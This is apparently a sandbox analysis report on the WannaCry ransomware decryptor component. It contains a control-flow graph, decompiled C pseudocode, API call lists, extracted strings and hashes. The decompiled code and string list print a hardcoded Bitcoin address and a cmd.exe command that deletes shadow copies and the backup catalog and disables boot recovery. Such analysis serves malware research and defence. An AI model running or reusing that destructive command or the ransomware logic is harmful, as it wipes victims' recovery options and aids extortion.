6599 40d569 time 6598->6599 6600 40d551 Sleep 6598->6600 6599->6595 6599->6598 6600->6598 6574 404fe0 #6334 6575 404ff4 #4853 6574->6575 6576 404ffb 6574->6576 6575->6576 6174 405df0 6179 405d90 #654 #765 6174->6179 6176 405df8 6177 405e08 6176->6177 6178 405dff #825 6176->6178 6178->6177 6179->6176 5938 4090f0 5939 409124 #540 #3874 5938->5939 5940 40971e 5938->5940 5941 409185 5939->5941 5942 40915e 5939->5942 5943 40919c _ftol 5941->5943 5944 40918e #860 5941->5944 5945 40917c 5942->5945 5948 40916e #860 5942->5948 5943->5945 5944->5943 5946 4091d5 SendMessageA #2860 5945->5946 5947 40970a #800 5945->5947 5949 409208 5946->5949 5947->5940 5948->5945 5964 409870 5949->5964 5951 409232 #5875 #6170 GetWindowOrgEx #540 #2818 5953 409329 GetObjectA 5951->5953 5954 40935b GetTextExtentPoint32A 5951->5954 5953->5954 5956 40938b GetViewportOrgEx 5954->5956 5962 409411 5956->5962 5957 409630 #800 5958 409662 5957->5958 5959 40965a #6170 5957->5959 5960 409685 #2414 #2414 5958->5960 5961 40967d #5875 5958->5961 5959->5958 5960->5947 5961->5960 5962->5957 5965 409880 #2414 5964->5965 5965->5951 6426 406ef0 6427 406f03 #823 6426->6427 6428 406f6a 6426->6428 6427->6428 6429 406f25 SendMessageA ShellExecuteA #825 6427->6429 6429->6428 6163 4011f0 6164 40120b #5280 6163->6164 6165 4011fd 6163->6165 6165->6164 6166 401203 6165->6166 6167 4019f0 #765 6168 401a08 6167->6168 6169 4019ff #825 6167->6169 6169->6168 6170 4059f0 6171 4059f8 6170->6171 6172 405a08 6171->6172 6173 4059ff #825 6171->6173 6173->6172 6601 4067f0 IsIconic 6602 406808 7 API calls 6601->6602 6603 40689a #2379 6601->6603 6604 409ff0 ExtTextOutA 5967 405080 5972 4050a0 #800 #795 5967->5972 5969 405088 5970 405098 5969->5970 5971 40508f #825 5969->5971 5971->5970 5972->5969 5973 40d880 5976 40d0a0 time srand rand 5973->5976 5975 40d88f 5977 40d0e1 5976->5977 5978 40d0d3 rand 5976->5978 5977->5975 5978->5977 5978->5978 6180 403180 6185 4031a0 #2414 #2414 #616 #693 #641 6180->6185 6182 403188 6183 403198 

                                  Control-flow Graph

                                  C-Code - Quality: 71%
                                  			E004064D0(intOrPtr __ecx, void* __fp0) {
                                  				char _v1032;
                                  				char _v1424;
                                  				void _v2256;
                                  				void _v2456;
                                  				void _v2707;
                                  				char _v2708;
                                  				intOrPtr _v2720;
                                  				short _v2724;
                                  				int _t48;
                                  				int _t49;
                                  				intOrPtr* _t50;
                                  				intOrPtr _t60;
                                  				intOrPtr _t63;
                                  				intOrPtr _t66;
                                  				short _t70;
                                  				void* _t82;
                                  				char* _t87;
                                  				char* _t89;
                                  				intOrPtr _t90;
                                  				intOrPtr _t98;
                                  				intOrPtr _t99;
                                  				intOrPtr _t100;
                                  				intOrPtr _t105;
                                  				char _t122;
                                  				intOrPtr _t134;
                                  				intOrPtr _t135;
                                  				intOrPtr _t136;
                                  				intOrPtr* _t140;
                                  				intOrPtr* _t141;
                                  				intOrPtr* _t142;
                                  				intOrPtr* _t161;
                                  				intOrPtr* _t162;
                                  				intOrPtr* _t163;
                                  				void* _t165;
                                  				void* _t167;
                                  				intOrPtr* _t168;
                                  				void* _t169;
                                  				void* _t170;
                                  				void* _t171;
                                  				void* _t201;
                                  
                                  				_t201 = __fp0;
                                  				_t90 = __ecx; // executed
                                  				L00412CB0(); // executed
                                  				SendMessageA( *(__ecx + 0x20), 0x80, 1,  *(__ecx + 0x82c)); // executed
                                  				SendMessageA( *(_t90 + 0x20), 0x80, 0,  *(_t90 + 0x82c)); // executed
                                  				_t48 = E00401C70(0);
                                  				_t170 = _t169 + 4;
                                  				if(_t48 == 0) {
                                  					_t122 =  *0x421798; // 0x0
                                  					_v2708 = _t122;
                                  					memset( &_v2707, _t48, 0x40 << 2);
                                  					asm("stosw");
                                  					asm("stosb");
                                  					GetModuleFileNameA(0,  &_v2708, 0x104);
                                  					_t87 = strrchr( &_v2708, 0x5c);
                                  					_t170 = _t170 + 0x14;
                                  					if(_t87 != 0) {
                                  						_t89 = strrchr( &_v2708, 0x5c);
                                  						_t170 = _t170 + 8;
                                  						 *_t89 = 0;
                                  					}
                                  					SetCurrentDirectoryA( &_v2708);
                                  				}
                                  				_t167 = _t90 + 0x50c;
                                  				_t49 = E00401A10(_t167, 1);
                                  				_t171 = _t170 + 8;
                                  				if(_t49 == 0) {
                                  					memset(_t167, _t49, 0xc3 << 2);
                                  					asm("repne scasb");
                                  					_t165 = "13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94";
                                  					_t82 = memcpy(_t165 + 0x175b75a, _t165, memcpy(_t90 + 0x5be, _t165, 0 << 2) & 0x00000003);
                                  					 *((intOrPtr*)(_t90 + 0x584)) = 0x43960000;
                                  					 *(_t90 + 0x588) = 0;
                                  					__imp__time(0);
                                  					 *(_t90 + 0x578) = _t82;
                                  					E00401A10(_t167, 0);
                                  					_t171 = _t171 + 0x30;
                                  				}
                                  				_t50 = E00402C40();
                                  				__imp__#115(0x202,  &_v1424); // executed
                                  				__imp____p___argc();
                                  				if( *_t50 > 1) {
                                  					_t168 = __imp____p___argv;
                                  					_t140 = "fi";
                                  					_t161 =  *((intOrPtr*)( *((intOrPtr*)( *_t168())) + 4));
                                  					while(1) {
                                  						_t98 =  *_t161;
                                  						_t60 = _t98;
                                  						if(_t98 !=  *_t140) {
                                  							break;
                                  						}
                                  						if(_t60 == 0) {
                                  							L12:
                                  							_t60 = 0;
                                  						} else {
                                  							_t136 =  *((intOrPtr*)(_t161 + 1));
                                  							_t22 = _t140 + 1; // 0x31000069
                                  							_t60 = _t136;
                                  							if(_t136 !=  *_t22) {
                                  								break;
                                  							} else {
                                  								_t161 = _t161 + 2;
                                  								_t140 = _t140 + 2;
                                  								if(_t60 != 0) {
                                  									continue;
                                  								} else {
                                  									goto L12;
                                  								}
                                  							}
                                  						}
                                  						L14:
                                  						if(_t60 == 0) {
                                  							E00407F80(_t90);
                                  							ExitProcess(0);
                                  						}
                                  						_t141 = "co";
                                  						_t162 =  *((intOrPtr*)( *((intOrPtr*)( *_t168())) + 4));
                                  						while(1) {
                                  							_t99 =  *_t162;
                                  							_t63 = _t99;
                                  							if(_t99 !=  *_t141) {
                                  								break;
                                  							}
                                  							if(_t63 == 0) {
                                  								L21:
                                  								_t63 = 0;
                                  							} else {
                                  								_t135 =  *((intOrPtr*)(_t162 + 1));
                                  								_t25 = _t141 + 1; // 0x6600006f
                                  								_t63 = _t135;
                                  								if(_t135 !=  *_t25) {
                                  									break;
                                  								} else {
                                  									_t162 = _t162 + 2;
                                  									_t141 = _t141 + 2;
                                  									if(_t63 != 0) {
                                  										continue;
                                  									} else {
                                  										goto L21;
                                  									}
                                  								}
                                  							}
                                  							L23:
                                  							if(_t63 == 0) {
                                  								E004080C0(_t90);
                                  								ExitProcess(0);
                                  							}
                                  							_t142 = "vs";
                                  							_t163 =  *((intOrPtr*)( *((intOrPtr*)( *_t168())) + 4));
                                  							while(1) {
                                  								_t100 =  *_t163;
                                  								_t66 = _t100;
                                  								if(_t100 !=  *_t142) {
                                  									break;
                                  								}
                                  								if(_t66 == 0) {
                                  									L30:
                                  									_t66 = 0;
                                  								} else {
                                  									_t134 =  *((intOrPtr*)(_t163 + 1));
                                  									_t28 = _t142 + 1; // 0x63000073
                                  									_t66 = _t134;
                                  									if(_t134 !=  *_t28) {
                                  										break;
                                  									} else {
                                  										_t163 = _t163 + 2;
                                  										_t142 = _t142 + 2;
                                  										if(_t66 != 0) {
                                  											continue;
                                  										} else {
                                  											goto L30;
                                  										}
                                  									}
                                  								}
                                  								L32:
                                  								if(_t66 == 0) {
                                  									Sleep(0x2710); // executed
                                  									memset( &_v2256, memcpy( &_v2456, "/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet", 0x32 << 2), 0xce << 2);
                                  									_t70 = "cmd.exe"; // 0x2e646d63
                                  									_t105 =  *0x420fd4; // 0x657865
                                  									_v2724 = _t70;
                                  									_v2720 = _t105;
                                  									if(E00401BB0() != 0) {
                                  										_push( &_v2456);
                                  										_push( &_v2724);
                                  										sprintf( &_v1032, "%s %s");
                                  										E00401A90( &_v1032, 0, 0);
                                  									} else {
                                  										E00401B50( &_v2724,  &_v2456, _t71);
                                  									}
                                  									ExitProcess(0); // executed
                                  								}
                                  								goto L37;
                                  							}
                                  							asm("sbb eax, eax");
                                  							asm("sbb eax, 0xffffffff");
                                  							goto L32;
                                  						}
                                  						asm("sbb eax, eax");
                                  						asm("sbb eax, 0xffffffff");
                                  						goto L23;
                                  					}
                                  					asm("sbb eax, eax");
                                  					asm("sbb eax, 0xffffffff");
                                  					goto L14;
                                  				}
                                  				L37:
                                  				E00407E80();
                                  				SetWindowTextW( *(_t90 + 0x20), L"Wana Decrypt0r 2.0");
                                  				E00406F80(_t90, _t201);
                                  				E00406C20(_t90);
                                  				SetTimer( *(_t90 + 0x20), 0x3e9, 0x3e8, 0);
                                  				SetTimer( *(_t90 + 0x20), 0x3ea, 0x7530, 0);
                                  				 *0x42189c = _t90;
                                  				return 1;
                                  			}












































                                  APIs
                                  • #4710.MFC42 ref: 004064DC
                                  • SendMessageA.USER32(?,00000080,00000001,?), ref: 004064F9
                                  • SendMessageA.USER32(?,00000080,00000000,?), ref: 0040650D
                                    • Part of subcall function 00401C70: wcscat.MSVCRT ref: 00401CC1
                                    • Part of subcall function 00401C70: RegCreateKeyW.ADVAPI32(80000001,?,?), ref: 00401D00
                                    • Part of subcall function 00401C70: GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 00401D2A
                                    • Part of subcall function 00401C70: RegSetValueExA.ADVAPI32(?,0041FDC4,00000000,00000001,?), ref: 00401D53
                                    • Part of subcall function 00401C70: RegCloseKey.KERNELBASE(00000000), ref: 00401DA3
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00406541
                                  • strrchr.MSVCRT ref: 00406554
                                  • strrchr.MSVCRT ref: 00406564
                                  • SetCurrentDirectoryA.KERNEL32(?), ref: 00406571
                                  • time.MSVCRT ref: 004065D1
                                  • __p___argc.MSVCRT(00000202,?), ref: 004065FA
                                  • __p___argv.MSVCRT ref: 0040661A
                                  • ExitProcess.KERNEL32 ref: 0040665B
                                  • __p___argv.MSVCRT ref: 00406666
                                  • ExitProcess.KERNEL32 ref: 004066A7
                                  • __p___argv.MSVCRT ref: 004066B2
                                  • Sleep.KERNELBASE(00002710), ref: 004066F3
                                  • sprintf.MSVCRT ref: 0040676A
                                  • ExitProcess.KERNEL32 ref: 00406786
                                  • SetWindowTextW.USER32(?,Wana Decrypt0r 2.0), ref: 0040679C
                                  • SetTimer.USER32(?,000003E9,000003E8,00000000), ref: 004067C6
                                  • SetTimer.USER32(?,000003EA,00007530,00000000), ref: 004067D8
                                  Strings
                                  • Wana Decrypt0r 2.0, xrefs: 00406796
                                  • %s %s, xrefs: 00406764
                                  • 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94, xrefs: 00406595
                                  • /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, xrefs: 004066FE
                                  • cmd.exe, xrefs: 0040671C
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess__p___argv$CurrentDirectoryMessageSendTimerstrrchr$#4710CloseCreateFileModuleNameSleepTextValueWindow__p___argcsprintftimewcscat
                                  • String ID: %s %s$/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet$13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94$Wana Decrypt0r 2.0$cmd.exe
                                  • API String ID: 623806192-606506946
                                  • Opcode ID: ae9b914f860960fc1fe1eb8876ac2c32c64d9403cfc96aba4f43f79c31e3e0e0
                                  • Instruction ID: 76468553a1f47653d6b265dfd970fa21b418b24b97d30d9546a7e2687b9e40c0
                                  • Opcode Fuzzy Hash: ae9b914f860960fc1fe1eb8876ac2c32c64d9403cfc96aba4f43f79c31e3e0e0
                                  • Instruction Fuzzy Hash: 72816C35704301ABD7109F309C41BEB7B95AF99304F15493AFD4AAB3D1DA7AE8188B98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 84%
                                  			E004060E0(intOrPtr __ecx, intOrPtr _a4) {
                                  				char _v12;
                                  				intOrPtr _v16;
                                  				intOrPtr _v44;
                                  				struct HINSTANCE__* _t82;
                                  				struct HICON__* _t83;
                                  				intOrPtr _t119;
                                  				intOrPtr _t124;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413E0B);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t124;
                                  				_push(__ecx);
                                  				_t119 = __ecx;
                                  				_push(_a4);
                                  				_push(0x66);
                                  				_v16 = __ecx;
                                  				L00412C92();
                                  				_v12 = 0;
                                  				L00412C8C();
                                  				 *((intOrPtr*)(__ecx + 0x60)) = 0x415a58;
                                  				_v12 = 1;
                                  				L00412C8C();
                                  				 *((intOrPtr*)(__ecx + 0xa0)) = 0x416538;
                                  				_v12 = 2;
                                  				L00412C8C();
                                  				 *((intOrPtr*)(__ecx + 0xe0)) = 0x416538;
                                  				_v12 = 3;
                                  				E004085C0(__ecx + 0x120);
                                  				_v12 = 4;
                                  				E004085C0(__ecx + 0x1a4);
                                  				_v12 = 5;
                                  				E00404090(__ecx + 0x228);
                                  				_v12 = 6;
                                  				E00404090(__ecx + 0x290);
                                  				_v12 = 7;
                                  				E00404090(__ecx + 0x2f8);
                                  				_v12 = 8;
                                  				E00404090(__ecx + 0x360);
                                  				_v12 = 9;
                                  				E00405000(__ecx + 0x3c8);
                                  				_v12 = 0xa;
                                  				E00405000(__ecx + 0x444);
                                  				_v12 = 0xb;
                                  				L00412C8C();
                                  				 *((intOrPtr*)(__ecx + 0x4c0)) = 0x416478;
                                  				_v12 = 0xc;
                                  				L00412DA6();
                                  				_v12 = 0xd;
                                  				L00412DA6();
                                  				_v12 = 0xe;
                                  				L00412DA6();
                                  				_v12 = 0xf;
                                  				L00412DA6();
                                  				 *((intOrPtr*)(__ecx + 0x834)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x830)) = 0x415a44;
                                  				 *((intOrPtr*)(__ecx + 0x83c)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x838)) = 0x415a44;
                                  				 *((intOrPtr*)(__ecx + 0x844)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x840)) = 0x415a44;
                                  				 *((intOrPtr*)(__ecx + 0x84c)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x848)) = 0x415a44;
                                  				 *((intOrPtr*)(__ecx + 0x854)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x850)) = 0x415a44;
                                  				 *((intOrPtr*)(__ecx + 0x85c)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x858)) = 0x415a44;
                                  				 *((intOrPtr*)(__ecx + 0x864)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x860)) = 0x415a44;
                                  				 *((intOrPtr*)(__ecx + 0x86c)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x868)) = 0x415a44;
                                  				 *((intOrPtr*)(__ecx + 0x874)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x870)) = 0x415a44;
                                  				 *((intOrPtr*)(__ecx + 0x87c)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x878)) = 0x415a44;
                                  				 *((intOrPtr*)(__ecx + 0x884)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x880)) = 0x415a30;
                                  				_v12 = 0x1b;
                                  				_t82 = E00407640(__ecx + 0x888);
                                  				 *((intOrPtr*)(__ecx + 0x888)) = 0x415a30;
                                  				 *((intOrPtr*)(__ecx + 0x894)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x890)) = 0x415a30;
                                  				_push(0x421798);
                                  				_v12 = 0x1d;
                                  				 *((intOrPtr*)(__ecx)) = 0x4163a0;
                                  				L00412DA0();
                                  				_push(0x421798);
                                  				L00412DA0();
                                  				_push(0x421798);
                                  				L00412DA0();
                                  				L00412E5A();
                                  				_push(0x80);
                                  				_push(0xe);
                                  				L00412F2C();
                                  				_t83 = LoadIconA(_t82, 0x80); // executed
                                  				_push(0x421798);
                                  				 *(_t119 + 0x82c) = _t83;
                                  				 *((intOrPtr*)(_t119 + 0x824)) = 0;
                                  				 *((intOrPtr*)(_t119 + 0x828)) = 0;
                                  				 *((intOrPtr*)(_t119 + 0x818)) = 0;
                                  				L00412DA0();
                                  				 *((intOrPtr*)(_t119 + 0x820)) = 0;
                                  				 *[fs:0x0] = _v44;
                                  				return _t119;
                                  			}










                                  APIs
                                  • #324.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406107
                                  • #567.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406117
                                  • #567.MFC42(00000066,00000000), ref: 0040612F
                                  • #567.MFC42(00000066,00000000), ref: 00406147
                                    • Part of subcall function 004085C0: #567.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085E2
                                    • Part of subcall function 004085C0: #341.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085F6
                                    • Part of subcall function 004085C0: GetSysColor.USER32 ref: 0040861D
                                    • Part of subcall function 004085C0: GetSysColor.USER32(00000009), ref: 00408624
                                    • Part of subcall function 004085C0: GetSysColor.USER32(00000012), ref: 0040862B
                                    • Part of subcall function 004085C0: GetSysColor.USER32(00000002), ref: 00408632
                                    • Part of subcall function 004085C0: KiUserCallbackDispatcher.NTDLL(00001008,00000000,00000000,00000000), ref: 0040864A
                                    • Part of subcall function 004085C0: GetSysColor.USER32(0000001B), ref: 0040865C
                                    • Part of subcall function 004085C0: #6140.MFC42(00000002,000000FF), ref: 00408667
                                    • Part of subcall function 00404090: #567.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040B0
                                    • Part of subcall function 00404090: #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040C6
                                    • Part of subcall function 00404090: #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040D5
                                    • Part of subcall function 00404090: #860.MFC42(00421798), ref: 004040F6
                                    • Part of subcall function 00404090: #858.MFC42(00000000,00421798), ref: 004040FE
                                    • Part of subcall function 00404090: LoadCursorA.USER32(00000000,00007F89), ref: 00404118
                                    • Part of subcall function 00404090: LoadCursorA.USER32(00000000,00007F00), ref: 00404123
                                    • Part of subcall function 00405000: #567.MFC42(?,?,?,?,00413893,000000FF), ref: 0040501E
                                    • Part of subcall function 00405000: #540.MFC42(?,?,?,?,00413893,000000FF), ref: 00405032
                                  • #567.MFC42(00000066,00000000), ref: 004061DF
                                  • #540.MFC42(00000066,00000000), ref: 004061F7
                                  • #540.MFC42(00000066,00000000), ref: 00406209
                                  • #540.MFC42(00000066,00000000), ref: 00406219
                                  • #540.MFC42(00000066,00000000), ref: 00406229
                                  • #860.MFC42(00421798,00000066,00000000), ref: 004062F7
                                  • #860.MFC42(00421798,00421798,00000066,00000000), ref: 00406303
                                  • #860.MFC42(00421798,00421798,00421798,00000066,00000000), ref: 00406313
                                  • #1168.MFC42(00421798,00421798,00421798,00000066,00000000), ref: 00406318
                                  • #1146.MFC42(00000080,0000000E,00000080,00421798,00421798,00421798,00000066,00000000), ref: 00406329
                                  • LoadIconA.USER32(00000000,00000080), ref: 0040632F
                                  • #860.MFC42(00421798), ref: 00406358
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #540#567$#860Color$Load$Cursor$#1146#1168#324#341#6140#858CallbackDispatcherIconUser
                                  • String ID: 0ZA$0ZA$0ZA$DZA
                                  • API String ID: 3237077636-3729005435
                                  • Opcode ID: 8898f9c07cd83b19e88eb16f26038038037ccb9ffe995bcce6d49ed8a8e75e34
                                  • Instruction ID: 094c42c2691411c2b0867f220185f46eb880b1852b80e7f1edf951ce12ca3c27
                                  • Opcode Fuzzy Hash: 8898f9c07cd83b19e88eb16f26038038037ccb9ffe995bcce6d49ed8a8e75e34
                                  • Instruction Fuzzy Hash: 6261E970544B419ED364EF36C5817DAFBE4BF95304F40891EE1EA82281DFB86149CFAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 94%
                                  			E00405A60(void* __ecx) {
                                  				char _v8;
                                  				intOrPtr _v16;
                                  				char _v24;
                                  				char _v32;
                                  				char _v40;
                                  				char _v48;
                                  				char _v56;
                                  				char _v64;
                                  				char _v72;
                                  				char _v80;
                                  				char _v88;
                                  				char _v96;
                                  				char _v104;
                                  				char _v112;
                                  				char _v120;
                                  				void* _v140;
                                  				void* _v928;
                                  				void* _v932;
                                  				void* _v936;
                                  				void* _v1000;
                                  				char _v1124;
                                  				char _v1248;
                                  				char _v1352;
                                  				char _v1456;
                                  				char _v1560;
                                  				char _v1664;
                                  				char _v1796;
                                  				char _v1928;
                                  				void* _v1992;
                                  				void* _v2056;
                                  				void* _v2120;
                                  				char _v2212;
                                  				char _v2216;
                                  				intOrPtr _t144;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413A76);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t144;
                                  				E0040B620(L"Wana Decrypt0r 2.0", 1);
                                  				_push(0);
                                  				L00412F08();
                                  				L00412F02();
                                  				L00412EFC();
                                  				E004060E0( &_v2212, 0);
                                  				_v8 = 0;
                                  				 *((intOrPtr*)(__ecx + 0x20)) =  &_v2216;
                                  				L00412B72(); // executed
                                  				_v8 = 0x1d;
                                  				_v24 = 0x415a30;
                                  				E00403F20( &_v24);
                                  				_v8 = 0x1c;
                                  				_v32 = 0x415a30;
                                  				E00403F20( &_v32);
                                  				_v8 = 0x1b;
                                  				_v40 = 0x415a30;
                                  				E00403F20( &_v40);
                                  				_v8 = 0x1a;
                                  				_v48 = 0x415a44;
                                  				E00403F20( &_v48);
                                  				_v8 = 0x19;
                                  				_v56 = 0x415a44;
                                  				E00403F20( &_v56);
                                  				_v8 = 0x18;
                                  				_v64 = 0x415a44;
                                  				E00403F20( &_v64);
                                  				_v8 = 0x17;
                                  				_v72 = 0x415a44;
                                  				E00403F20( &_v72);
                                  				_v8 = 0x16;
                                  				_v80 = 0x415a44;
                                  				E00403F20( &_v80);
                                  				_v8 = 0x15;
                                  				_v88 = 0x415a44;
                                  				E00403F20( &_v88);
                                  				_v8 = 0x14;
                                  				_v96 = 0x415a44;
                                  				E00403F20( &_v96);
                                  				_v8 = 0x13;
                                  				_v104 = 0x415a44;
                                  				E00403F20( &_v104);
                                  				_v8 = 0x12;
                                  				E00403F90( &_v112);
                                  				_v8 = 0x11;
                                  				E00403F90( &_v120);
                                  				_v8 = 0x10;
                                  				L00412CC2();
                                  				_v8 = 0xf;
                                  				L00412CC2();
                                  				_v8 = 0xe;
                                  				L00412CC2();
                                  				_v8 = 0xd;
                                  				L00412CC2();
                                  				_v8 = 0xc;
                                  				L00412EF6();
                                  				_v8 = 0xb;
                                  				E004050A0( &_v1124);
                                  				_v8 = 0xa;
                                  				E004050A0( &_v1248);
                                  				_v8 = 9;
                                  				E00404170( &_v1352);
                                  				_v8 = 8;
                                  				E00404170( &_v1456);
                                  				_v8 = 7;
                                  				E00404170( &_v1560);
                                  				_v8 = 6;
                                  				E00404170( &_v1664);
                                  				_v8 = 5;
                                  				E00405D90( &_v1796);
                                  				_v8 = 4;
                                  				E00405D90( &_v1928);
                                  				_v8 = 3;
                                  				L00412EF0();
                                  				_v8 = 2;
                                  				L00412EF0();
                                  				_v8 = 1;
                                  				L00412D4C();
                                  				_v8 = 0xffffffff;
                                  				L00412C86();
                                  				 *[fs:0x0] = _v16;
                                  				return 0;
                                  			}





































                                  APIs
                                    • Part of subcall function 0040B620: FindWindowW.USER32(00000000,00000000), ref: 0040B628
                                    • Part of subcall function 0040B620: ShowWindow.USER32(00000000,00000005,00000000,?,00000000), ref: 0040B638
                                    • Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B651
                                    • Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FE,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B660
                                    • Part of subcall function 0040B620: SetForegroundWindow.USER32(00000000), ref: 0040B663
                                    • Part of subcall function 0040B620: SetFocus.USER32(00000000,?,00000000), ref: 0040B66A
                                    • Part of subcall function 0040B620: SetActiveWindow.USER32(00000000,?,00000000), ref: 0040B671
                                    • Part of subcall function 0040B620: BringWindowToTop.USER32(00000000), ref: 0040B678
                                    • Part of subcall function 0040B620: ExitProcess.KERNEL32 ref: 0040B689
                                  • #1134.MFC42(00000000,Wana Decrypt0r 2.0,00000001), ref: 00405A8C
                                  • #2621.MFC42 ref: 00405A96
                                  • #6438.MFC42 ref: 00405A9B
                                    • Part of subcall function 004060E0: #324.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406107
                                    • Part of subcall function 004060E0: #567.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406117
                                    • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 0040612F
                                    • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 00406147
                                    • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 004061DF
                                    • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 004061F7
                                    • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406209
                                    • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406219
                                    • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406229
                                  • #2514.MFC42 ref: 00405AC1
                                    • Part of subcall function 00403F20: #2414.MFC42(?,?,?,004136B8,000000FF,00403F08), ref: 00403F4B
                                    • Part of subcall function 00403F90: #2414.MFC42(?,?,?,004136D8,000000FF,00403F78), ref: 00403FBB
                                  • #800.MFC42 ref: 00405C33
                                  • #800.MFC42 ref: 00405C47
                                  • #800.MFC42 ref: 00405C5B
                                  • #800.MFC42 ref: 00405C6F
                                  • #781.MFC42 ref: 00405C83
                                    • Part of subcall function 004050A0: #800.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050CE
                                    • Part of subcall function 004050A0: #795.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050DD
                                    • Part of subcall function 00404170: #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
                                    • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
                                    • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
                                    • Part of subcall function 00404170: #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
                                    • Part of subcall function 00405D90: #654.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DBE
                                    • Part of subcall function 00405D90: #765.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DCD
                                  • #609.MFC42 ref: 00405D37
                                  • #609.MFC42 ref: 00405D4B
                                  • #616.MFC42 ref: 00405D5C
                                  • #641.MFC42 ref: 00405D70
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
